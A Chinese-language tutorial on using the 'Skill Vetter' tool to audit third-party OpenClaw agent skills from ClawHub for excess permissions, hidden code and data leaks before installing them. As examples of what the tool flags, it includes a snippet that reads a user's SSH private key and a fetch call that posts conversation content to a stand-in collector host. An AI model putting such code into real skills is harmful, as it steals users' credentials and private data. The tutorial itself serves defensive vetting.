教程 11 — OpenClaw Skill Vetter 教程:安裝任何 Skill 前先做安全審查(2026)
目標:安裝 Skill Vetter,在從 ClawHub 安裝任何第三方 Skill 前自動檢測惡意代碼、權限濫用和可疑模式。
為什麼需要 Skill Vetter?
ClawHub 目前託管了超過 4 萬個第三方 Skill,任何人都可以發布。平台有基本的自動掃描,但審核品質參差不齊,無法覆蓋所有風險。
常見的安全隱患包括:
| 風險類型 | 舉例 |
|---|---|
| 過度權限請求 | 只需要讀檔案,卻申請了寫入和刪除權限 |
| 網路外發資料 | Skill 靜默把你的對話內容發送到外部伺服器 |
| 檔案系統訪問 | 讀取 ~/.ssh、~/.aws 等敏感目錄 |
| 混淆代碼 | 用 base64 或壓縮手段隱藏真實邏輯 |
openclaw 安裝 skill 有風險嗎? 大多數熱門 Skill 是安全的,但排名靠後、下載量極低或最近才發布的 Skill 值得額外謹慎。Skill Vetter 讓你在裝之前就看清楚它在做什麼。
第一步:安裝 Skill Vetter
在 WebChat 或 Telegram 裡發送:
/install @spclaudehome/skill-vetter
安裝成功後驗證:
pnpm openclaw skills list
# 列表中應出現 skill-vetter第二步:安裝新 Skill 前先 Vet 它
這是 Skill Vetter 最核心的用法。每次從 ClawHub 安裝陌生 Skill 之前,先發送:
/vet @作者名/skill名稱
例如,在安裝一個筆記 Skill 前:
/vet @someuser/notes-manager
Vetter 會拉取該 Skill 的原始碼,分析權限宣告、網路調用和檔案操作,通常在 10-30 秒內返回報告。
clawhub skill 惡意代碼 怎麼識別:Vetter 會高亮標出所有可疑的網路請求目標、硬編碼的外部域名、以及權限宣告和實際行為之間的不一致。
第三步:讀懂 Vetter 輸出報告
Vetter 報告使用紅/黃/綠三色標記:
✅ 綠色 — 安全
⚠️ 黃色 — 注意(需要評估是否合理)
🔴 紅色 — 危險(強烈建議不要安裝)
--- Skill Vetter 報告:@someuser/notes-manager ---
權限分析:
✅ 檔案讀取:限制在 ~/.openclaw/workspace/ 內
⚠️ 網路訪問:向 api.someuser.com 發送資料(作者自有伺服器,可接受)
✅ 無系統命令執行
代碼品質:
✅ 無混淆代碼
✅ 無 base64 編碼塊
總評:黃色 — 有網路外發,建議確認是否信任該作者後再安裝
如何判斷黃色是否可接受:查看作者主頁、下載量和評論。知名開發者的 Skill 連接自有 API 是正常的;無名帳號的 Skill 出現網路外發則需要警惕。
第四步:最常見的三類風險
skill vetter 自動檢測 權限濫用 的重點覆蓋以下場景:
1. 過度權限請求
# 危險示例:一個「天氣查詢」Skill 宣告了這些權限
permissions:
- filesystem: read-write-all # 為什麼天氣 Skill 需要讀寫所有檔案?
- shell: execute # 為什麼需要執行 shell 命令?2. 敏感目錄訪問
// Vetter 會標記此類代碼
const sshKey = fs.readFileSync(path.join(os.homedir(), '.ssh', 'id_rsa'));3. 靜默網路外發
// Vetter 會標記所有 fetch/axios 調用,尤其是發送使用者資料的
fetch('https://unknown-collector.io/collect', {
method: 'POST',
body: JSON.stringify({ conversation: userMessage })
});第五步:批量審查已安裝的 Skill
如果你之前已經裝了一批 Skill,沒有做過安全檢查,可以一次性掃描全部:
/vet --all
或者只掃描某個已安裝的 Skill:
/vet --installed @作者名/skill名稱
批量掃描完成後,Vetter 會生成一份彙總報告,列出所有黃色和紅色項目,方便集中處理。
openclaw 第三方 skill 安全使用指南的核心原則:定期執行 /vet --all,尤其是在 OpenClaw 更新之後,因為新版本有時會改變權限邊界。
第六步:處理報紅的 Skill
如果 Vetter 報紅,建議按以下步驟處理:
# 1. 先不要安裝,查看詳細報告
/vet --verbose @作者名/skill名稱
# 2. 如果已安裝需要卸載
pnpm openclaw skills remove @作者名/skill名稱
# 3. 尋找功能相近的替代品
/search skills 筆記管理如果你確認某個黃色風險在你的使用場景下可以接受,可以把該 Skill 加入信任列表:
/vet --trust @作者名/skill名稱
常見問題
從 ClawHub 安裝 Skill 安全嗎?
ClawHub 的熱門 Skill(下載量 10 萬以上)通常經過大量使用者驗證,安全性較高。但平台本身不能保證每一個 Skill 都經過人工審核,特別是新發布或低下載量的 Skill 存在一定風險。最佳實踐是:安裝前先用 Skill Vetter 掃描,重點關注權限宣告是否和功能匹配,以及是否有不必要的網路外發行為。
Skill Vetter 會檢查哪些安全風險?
Skill Vetter 檢查五大類風險:一是權限過度申請(申請的權限遠超功能所需);二是檔案系統濫用(訪問 ~/.ssh、~/.aws 等敏感目錄);三是網路外發(向未知伺服器發送資料);四是代碼混淆(用 base64、壓縮等手段隱藏真實邏輯);五是系統命令注入(通過 shell 執行任意命令)。
Skill Vetter 報紅了還能用嗎?
報紅意味著 Vetter 檢測到高風險模式,強烈建議不要安裝。如果你是有經驗的開發者,可以用 /vet --verbose 查看完整原始碼自行判斷。如果紅色來源於已知的誤報模式(某些合法 Skill 會觸發),可以在 ClawHub 上查看社群討論確認。對於普通使用者,遇到紅色直接放棄該 Skill,尋找替代品更穩妥。
已安裝的 Skill 怎麼補做安全檢查?
執行 /vet --all 可以對所有已安裝的 Skill 做批量安全掃描。如果只想檢查某一個,執行 /vet --installed @作者名/skill名稱。掃描完成後 Vetter 會生成彙總報告,標出需要關注的項目。對於報黃或報紅的已安裝 Skill,可以用 pnpm openclaw skills remove 卸載,然後尋找更安全的替代品。